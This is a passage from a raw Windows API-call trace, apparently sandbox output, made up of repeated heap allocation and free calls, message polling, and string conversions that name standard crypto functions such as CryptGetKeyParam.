lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.866] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0122.866] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa86e) returned 0x49aa010 [0122.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0122.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0122.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa86e) returned 0x49bf100 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0122.868] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0122.869] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.869] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0122.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0122.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.870] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0122.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.870] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.871] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0122.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0122.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.872] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0122.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0122.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0122.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0122.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0122.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0122.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0122.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0122.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: 